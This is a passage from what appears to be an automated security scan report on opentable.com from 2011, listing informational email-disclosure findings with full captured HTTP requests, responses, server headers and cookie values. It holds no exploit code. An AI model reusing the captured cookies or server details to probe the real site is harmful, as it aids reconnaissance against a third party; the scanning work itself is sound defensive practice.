Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...

8.168. http://www.opentable.com/rest_profile.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /rest_profile.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /rest_profile.aspx?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 03 Oct 2011 12:54:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Location: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Content-Length: 285
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1><p>The document has moved <a href="http://www.opentable
...[SNIP]...

8.169. http://www.opentable.com/restaurant-search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM&PartySize=2&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 12:54:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Location: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0; domain=.opentable.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 247

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.opentable.com/interim.aspx?rid=90&amp;restref=90&amp;m=4&amp;t=single&amp;p=2&amp;d=10/3/2011 7:00 PM&amp;
...[SNIP]...

8.170. http://www.opentable.com/styles/Modules/Search.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/Modules/Search.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/Modules/Search.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 18236
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:24 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:50 GMT

...#ProcessingMessage{border:1px solid red;background-color:#fff;position:absolute;z-index:100;top:200px;margin-left:20px;width:400px;display:none;}.Arrow{width:9px;height:9px;}.HeaderRow .Arrow{margi
...[SNIP]...

8.171. http://www.opentable.com/styles/Modules/popup.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/Modules/popup.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/Modules/popup.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 17479
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:24 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:51 GMT

... .universal_popup,.wrapper,#locationPopup{margin:.5em 0;position:absolute;z-index:555;}.boxTop{background:url(../../img/borders/modules/ot_box_noshadow.gif) no-repeat 100% 0;margin:0 0 0 18px;heigh
...[SNIP]...

8.172. http://www.opentable.com/styles/Normal/OTCalStylesNormal.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/Normal/OTCalStylesNormal.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/Normal/OTCalStylesNormal.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 5884
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:22 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:50 GMT

... #popupBody{margin:0;padding:0;background-color:#EFEDD8;}#popupBody form{padding:0;margin:0;}#Popup{font-family:Verdana,Arial,sans-serif;text-align:center;background:#FFFCE6;margin:0;padding:0;}#cl
...[SNIP]...

8.173. http://www.opentable.com/styles/Normal/ot_style003.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/Normal/ot_style003.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/Normal/ot_style003.css?ver=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 121886
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:24 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:46 GMT

h5{float:left;font-size:65%;text-align:left;margin:0 0 10px 0;padding:6px 0 4px 10px;font-weight:normal;color:White;width:747px;display:block;}* html h5{width:980px;}* html #BRTag{display:none;}.Detai
...[SNIP]...

8.174. http://www.opentable.com/styles/Normal/topandbot.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/Normal/topandbot.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/Normal/topandbot.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 13256
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:24 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:39 GMT

... body{background-color:#867F75;font-family:Verdana,Arial,sans-serif;text-align:center;background-position:center;}.divider{display:none;}a.error:link,a.error:hover,a.error:visited,a.error:active{co
...[SNIP]...

8.175. http://www.opentable.com/styles/Pages/Start.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/Pages/Start.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/Pages/Start.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 56747
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:22 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:21 GMT

body{margin-top:1px!important;}.DisplayNone{display:none;}#TopNav{margin-top:4px!important;}#ContentArea{background-color:#fefcf7;clear:both;display:block;float:left;padding:0;width:980px;color:#42382
...[SNIP]...

8.176. http://www.opentable.com/styles/PromoNationalRoundup.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/PromoNationalRoundup.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/PromoNationalRoundup.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 995
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:57 GMT

....NationalRoundupSection{background-color:#fffff1;float:left;width:945px;}.NationalRoundupTitle{font-family:Verdana,Arial,Helvetica,sans-serif;font-size:16px;font-weight:bold;text-align:center;paddi
...[SNIP]...

8.177. http://www.opentable.com/styles/RestaurantProfile.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/RestaurantProfile.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/RestaurantProfile.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 39215
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:55:06 GMT

...#RestSearch_SearchPanel{background-color:#cad6a8;float:left;margin:31px 0 0 0;padding:0;width:420px;}#StepTwoBody{float:left;margin:0;width:400px;background-color:#cad6a8;}#ProfileMainModule{float:
...[SNIP]...

8.178. http://www.opentable.com/styles/SearchControl.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/SearchControl.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/SearchControl.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 35649
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:12 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:51 GMT

... #ResultsMainModule #SearchNav_divNavSimpleSearchPanelOne{display:none;}#ResultsMainModule #SearchNav_divNavSimpleSearchVertDivider{display:none;}.SearchBar .BubbleUpMessage{padding:0 0 5px 15px;fo
...[SNIP]...

8.179. http://www.opentable.com/styles/dimensions.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/dimensions.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/dimensions.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1398
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:04 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:55:04 GMT

... .fourColOne,.fourColTwo,.fourColTwoAuto,.fourColThree,.fourColFour,.fiveColOne,.fiveColTwo,.fiveColThree,.fiveColFour,.fiveColFive{margin:0 0 15px 15px;padding:0;overflow-x:hidden;}.fourColOne{wid
...[SNIP]...

8.180. http://www.opentable.com/styles/dipProgram.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/dipProgram.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/dipProgram.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 26050
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:04 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:29 GMT

...#ResultsMainModule{margin:0;padding:0;float:left;display:block;text-align:left;width:980px;position:relative;}.NavSimpleSearch{border-bottom:1px dashed #ccc;}#HorizatalDivider{float:left;background
...[SNIP]...

8.181. http://www.opentable.com/styles/form_elements.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/form_elements.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/form_elements.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 15518
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:06 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
